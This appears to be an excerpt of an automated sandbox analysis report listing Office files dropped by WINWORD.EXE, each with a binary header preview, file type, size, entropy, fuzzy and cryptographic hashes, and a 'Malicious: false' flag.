                                                  Preview:PK.........V'B.._<....-.......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                  Category:dropped
                                                  Size (bytes):924687
                                                  Entropy (8bit):7.824849396154325
                                                  Encrypted:false
                                                  SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                                                  MD5:97EEC245165F2296139EF8D4D43BBB66
                                                  SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                                  SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                                  SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                                  Malicious:false
                                                  Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):966946
                                                  Entropy (8bit):7.8785200658952
                                                  Encrypted:false
                                                  SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                                                  MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                                  SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                                  SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                                  SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                                  Malicious:false
                                                  Preview:PK..........1A.......F`......[Content_Types].xml..n.@.._.y.ac $..,........-..g@.u.G.+t.:........D1...itgt>...k..lz;].8Kg^....N.l..........0.~}....ykk.A`..N..\...2+.e.c..r..P+....I.e.......|.^/.vc{......s..z....f^...8...'.zcN&.<....}.K.'h..X..y.c.qnn.s%...V('~v.W.......I%nX`.....G.........r.Gz.E..M.."..M....6n.a..V.K6.G?Qqz..............\e.K.>..lkM...`...k.5...sb.rbM8..8..9..pb..R..{>$..C.>......X..iw.'..a.09CPk.n...v....5n..Uk\...SC...j.Y.....Vq..vk>mi......z..t....v.]...n...e(.....s.i......]...q.r....~.WV/.j.Y......K..-.. Z..@.\.P..W...A..X8.`$C.F(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........c..0F...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP..........(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-.............0A...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP.........w(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........T..GI..~.....~....PK..........1A.s@.....O......._rels/.rels...J.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):1204049
                                                  Entropy (8bit):7.92476783994848
                                                  Encrypted:false
                                                  SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                                                  MD5:FD5BBC58056522847B3B75750603DF0C
                                                  SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                                  SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                                  SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                                  Malicious:false
                                                  Preview:PK..........1A..d T....P......[Content_Types].xml..Ms.@.....!...=.7....kX 5o.,L..<..........d..g/..dw.]...C...9...#g/."L..;...#. ]..f...w../._.3Y8..X.[..7._.[...K3..3.4......D.]l.?...~.&J&...s...;...H9...e.3.q.....k-.0>Lp:.7..eT...Y...P...OVg.....G..).aV...\Z.x...W.>f...oq.8.....I?Ky...g..."...J?....A$zL.].7.M.^..\....C..d/;.J0.7k.X4.e..?N{....r.."LZx.H?. ......;r.+...A<.;U.....4...!'k...s.&..)'k...d..d......._E..D...o..o...o...f.7;s..]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...s.....0..O.... ...>..>..>..>..>..>..>.........2V}......Q}#.&T...rU....\..\..\..\..\..\..\..\.W..W.^Z....Q}c;.o...>.Z..\.v...............................*Z....K.X.5X8.obG.MP.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.M.).....j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oZ/-c..`....7CaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,...|...].k.........PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):486596
                                                  Entropy (8bit):7.668294441507828
                                                  Encrypted:false
                                                  SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                                                  MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                                  SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                                  SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                                  SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                                  Malicious:false
                                                  Preview:PK.........V'BE,.{....#P......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):976001
                                                  Entropy (8bit):7.791956689344336
                                                  Encrypted:false
                                                  SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                                                  MD5:9E563D44C28B9632A7CF4BD046161994
                                                  SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                                  SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                                                  SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                                  Malicious:false
                                                  Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                  Category:dropped
                                                  Size (bytes):1463634
                                                  Entropy (8bit):7.898382456989258
                                                  Encrypted:false
                                                  SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                                                  MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                                  SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                                  SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                                  SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                                  Malicious:false
                                                  Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):2218943
                                                  Entropy (8bit):7.942378408801199
                                                  Encrypted:false
                                                  SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                                                  MD5:EE33FDA08FBF10EF6450B875717F8887
                                                  SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                                  SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                                  SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                                  Malicious:false
                                                  Preview:PK.........{MBS'..t...ip......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.._..w._..w._..w._..w._..w._..w.n..Ofu.-..K.e........T..q.F...R[...~.u.....Z..F....7.?.v....5O....zot..i.....b...^...Z...V...R...N...r./.?........=....#.`..\~n.n...)J./.......7........+......Q..]n............w......Ft........|......b...^...Z...V...R...N..W<x......l._...l..?.A......x....x.9.|.8..............u................w#.....nD..]...........R.......R.......R........o...].`.....A....#.`..\.....+J./.......7........+......Q..]n.........w9~7......Ft........|......b...^.c..-...-...-
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):1750795
                                                  Entropy (8bit):7.892395931401988
                                                  Encrypted:false
                                                  SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                                                  MD5:529795E0B55926752462CBF32C14E738
                                                  SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                                  SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                                  SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                                  Malicious:false
                                                  Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):2924237
                                                  Entropy (8bit):7.970803022812704
                                                  Encrypted:false
                                                  SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                                                  MD5:5AF1581E9E055B6E323129E4B07B1A45
                                                  SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                                  SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                                  SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                                  Malicious:false
                                                  Preview:PK.........{MB.$<.~....p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.......H^..<}...lA-.D.....lI/...hD.Z....|VM..ze........L..tU...g....lQ....Y...>MI...5-....S......h=..u.h..?;h...@k...h...'Z...D...;.....h=..'Z...D...;.....)^./.../U.../..../U.../..../U..?...'.........Ngz..A.~.8.#D....xot.u.?...eyot.n..{..sk....[......Z..F....l...o)..o..o...oi..o)..o..,..b.s......2.C.z.~8.......f......x.9.|.8..............u................r.nD..]...........w.~7...-...-...-...-...-...-....x.&l........>.4.z.~8..........=E....As.1..q. 9....w.7...1........w.}7......Ft...................o)..o..o...oi..o)..o..w.7a...x0...........d0..............A.......Fl.............Ft................w#...r.nD..]..M...K1.0..7....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):2357051
                                                  Entropy (8bit):7.929430745829162
                                                  Encrypted:false
                                                  SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                                                  MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                                  SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                                  SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                                  SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                                  Malicious:false
                                                  Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):3611324
                                                  Entropy (8bit):7.965784120725206
                                                  Encrypted:false
                                                  SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                                                  MD5:FB88BFB743EEA98506536FC44B053BD0
                                                  SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                                  SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                                  SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                                  Malicious:false
                                                  Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):1091485
                                                  Entropy (8bit):7.906659368807194
                                                  Encrypted:false
                                                  SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                                                  MD5:2192871A20313BEC581B277E405C6322
                                                  SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                                  SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                                  SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                                  Malicious:false
                                                  Preview:PK...........G`.jaV....P......[Content_Types].xml...n.@...W......T@.mwM.E....)....y...H}.N..ll8.h5g6Q.=3_......?...x..e^Di.p.^.ud...(Y/..{w..r..9.../M...Q*{..E...(.4..>..y,.>..~&..b-.a.?..4Q2Q=.2.......m....>-....;]......N'..A...g.D.m.@(}..'.3Z....#....(+....-q<uq.+....?....1.....Y?Oy......O"..J?....Q$zT.].7.N..Q Wi.....<.........-..rY....hy.x[9.b.%-<.V?.(......;r.+...Q<.;U.....4...!'k...s.&..)'k...d.s..}R....o".D.I..7..7.KL.7..Z.....v..b.5.2].f....l.t....Z...Uk...j.&.U-....&>.ia1..9lhG..Q.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.........j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oT/-c..`....7FaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,..7...&(L.....>.kw...i...i...i...i...i...i...i.......I...U_.....vT.....}..\...v..W.!-W.!-W.!-W.!-W.!-W.!-W.!-W.U...7.....k.pT...0..O.... ...>..>..>..>..>..>..>......f..2V}....W>jO....5..].?.o..oPK...........G.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):608122
                                                  Entropy (8bit):7.729143855239127
                                                  Encrypted:false
                                                  SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                                                  MD5:8BA551EEC497947FC39D1D48EC868B54
                                                  SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                                                  SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                                                  SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                                                  Malicious:false
                                                  Preview:PK.........LGE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK.........LG.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):5783
                                                  Entropy (8bit):7.88616857639663
                                                  Encrypted:false
                                                  SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                                                  MD5:8109B3C170E6C2C114164B8947F88AA1
                                                  SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                                  SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                                  SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                                  Malicious:false
                                                  Preview:PK.........A;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........pnB;.M.:....g......._rels/.rels...J.0.._%.n....xp..,{.i2M.........G..........7...3o/.......d.kyU....^..[>Q....j.#P.H......Z>..+!...B*|@...G...E....E]..".3.......!..7....,:..,.......Ot..0r....Z..&1..U..p.U-.[Uq&.......................Gyy.}n.(.C(i.x........?.vM..}..%.7.b.>L..]..PK........EV:5K..4....H......diagrams/layout1.xml.Yo.6........S.`......$M...Q8A...R..T.k...K.4CQG..}.A..9.?R....!&...Q..ZW.......Q....<8..z..g....4{d.>..;.{.>.X.....Y.2.......cR....9e.. ...}L.....yv&.&...r..h...._..M. e...[..}.>.k..........3.`.ygN...7.w..3..W.S.....w9....r(....Zb..1....z...&WM.D<......D9...ge......6+.Y....$f......wJ$O..N..FC..Er........?..is...-Z
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft OOXML
                                                  Category:dropped
                                                  Size (bytes):4026
                                                  Entropy (8bit):7.809492693601857
                                                  Encrypted:false
                                                  SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                                                  MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                                  SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                                  SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
